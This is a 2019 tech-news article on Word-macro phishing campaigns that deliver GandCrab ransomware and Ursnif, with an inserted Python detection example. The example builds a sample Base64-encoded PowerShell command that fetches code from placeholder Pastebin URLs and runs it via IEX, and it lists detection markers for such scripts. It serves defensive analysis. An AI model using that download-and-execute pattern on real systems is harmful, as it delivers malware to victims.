GandCrab ransomware and Ursnif virus spreading via MS Word macros - World of Tech Science


Friday 25 January 2019

GandCrab ransomware and Ursnif virus spreading via MS Word macros

Security researchers have discovered two different malware campaigns, one of which is distributing the Ursnif data-stealing trojan together with the GandCrab ransomware in the wild, while the other is infecting victims with Ursnif alone.


Although the two campaigns appear to be the work of two separate cyber-criminal groups, they share many similarities. Both attacks start with phishing emails carrying an attached Microsoft Word document embedded with malicious macros, and both then use PowerShell to deliver the malware payload.


Ursnif is a data-stealing malware that harvests sensitive information from the compromised computer, with the ability to collect banking credentials, browsing activity, keystrokes, and system and process information, and to deploy additional backdoors.

First seen last year, GandCrab is a widespread ransomware threat that, like every other ransomware on the market, encrypts the files of an infected system and urges victims to pay a ransom in digital currency to unlock them. Its developers primarily demand payment in DASH, which is harder to track.


MS Docs + VBS macros = Ursnif and GandCrab Infection

The first malware campaign, which delivers both malware families, was discovered by Carbon Black's security researchers, who found approximately 180 variants of MS Word documents in the wild targeting users with malicious VBS macros.


If successfully executed, the malicious VBS macro runs a PowerShell script, which then uses a series of techniques to download and execute both Ursnif and GandCrab on the targeted systems.






The PowerShell script is Base64-encoded and launches the next stage of the infection, which is responsible for downloading the main malware payloads onto the compromised system.


The first payload is a PowerShell one-liner that evaluates the architecture of the targeted system and accordingly downloads an additional payload from the Pastebin website, which is executed in memory, making its activity difficult for traditional anti-virus technologies to detect.


Carbon Black researchers said, "This is a version of the PowerShell Empire Invoke-PSInject module, in which very few modifications have been done." "The script will take a built-in PE [portable executable] file that has been encoded with Base64 and injects it into the current process."


The final payload then installs a version of the GandCrab ransomware on the victim's system, locking them out of their files until they pay the ransom in digital currency.



In the meantime, the malware also downloads an Ursnif executable from a remote server; once executed, it fingerprints the system, monitors web browser traffic to collect data, and then sends the data to the attacker's command-and-control (C&C) server.


"However, during this campaign, several Ursnif variants were hosted on the Bevendbreak[.]com site. Carbon Black was able to discover about 120 different Ursnif variants that were being hosted on the domains IceCondition[.]com and Bevendbreak[.]com," the researchers said.

MS Docs + VBS macros = Ursnif Data-Stealing Malware


Similarly, the second malware campaign, spotted by security researchers at Cisco Talos, leverages a Microsoft Word document containing a malicious VBA macro to deliver another variant of the same Ursnif malware.


This attack also compromises the target system in several steps, from phishing emails to running malicious PowerShell commands that establish persistence, and then downloading and installing the Ursnif data-stealing malware.


Talos researchers explained, "The PowerShell has three parts: the first part creates a function, which is later used to decode the Base64-encoded PowerShell; the second part creates a byte array containing a malicious DLL."


"The third part executes the Base64-decoding function created in the first part, passing a Base64-encoded string as the parameter. The returned decoded PowerShell is later executed by the shorthand Invoke-Expression (IEX) function."
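Both chains described above share the same observable shape on the endpoint: an Office process spawns PowerShell with a Base64-encoded command line, and the decoded script downloads or decodes a further stage and hands it to IEX. The following detection routine is an added example, not code from the article or from Carbon Black or Talos; the process-creation events, the decoded stage-one script, and the pastebin placeholder URLs are constructed for illustration.

```python
import base64
import re

# Constructed stage-one script, modelled on the architecture check + Pastebin download
# described for the Carbon Black campaign (URLs are placeholders, not real indicators).
STAGE1 = (
    "if ([IntPtr]::Size -eq 8) { $u = 'https://pastebin.com/raw/PLACEHOLDER64' } "
    "else { $u = 'https://pastebin.com/raw/PLACEHOLDER32' }; "
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)
# PowerShell's -EncodedCommand expects Base64 of the UTF-16LE script text.
ENCODED = base64.b64encode(STAGE1.encode("utf-16-le")).decode()

# Constructed process-creation events (Sysmon-style fields): one macro-spawned, one benign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")
ENC_FLAG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Markers of the second-stage behaviour the article describes: in-memory execution,
# embedded Base64 blobs, architecture checks and Pastebin-hosted payloads.
STAGE2_MARKERS = ("iex", "invoke-expression", "frombase64string",
                  "pastebin.com", "downloadstring", "[intptr]::size")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(event):
    """Return a list of finding strings for one process-creation event (empty if benign)."""
    findings = []
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS and image in ("powershell.exe", "pwsh.exe"):
        findings.append(f"office-spawned PowerShell ({parent} -> {image})")
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is not None:
        findings.append("base64-encoded command line")
        hits = [mk for mk in STAGE2_MARKERS if mk in decoded.lower()]
        if hits:
            findings.append("decoded script contains: " + ", ".join(hits))
    return findings
```

Running `analyze_event` over each entry in `SAMPLE_EVENTS` flags the Word-spawned event on all three counts and returns an empty list for the benign one; in production the same logic is applied to Sysmon Event ID 1 or Windows Security 4688 records with command-line auditing enabled.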


Once executed on a victim's computer, the malware collects information from the system, packs it into a CAB file, and then sends it over an HTTPS connection to its command-and-control server.


Talos researchers have published a list of indicators of compromise (IOCs), as well as the names of the payload files dropped on compromised machines, in their blog post, which can help you detect and stop Ursnif malware before it spreads across the network.
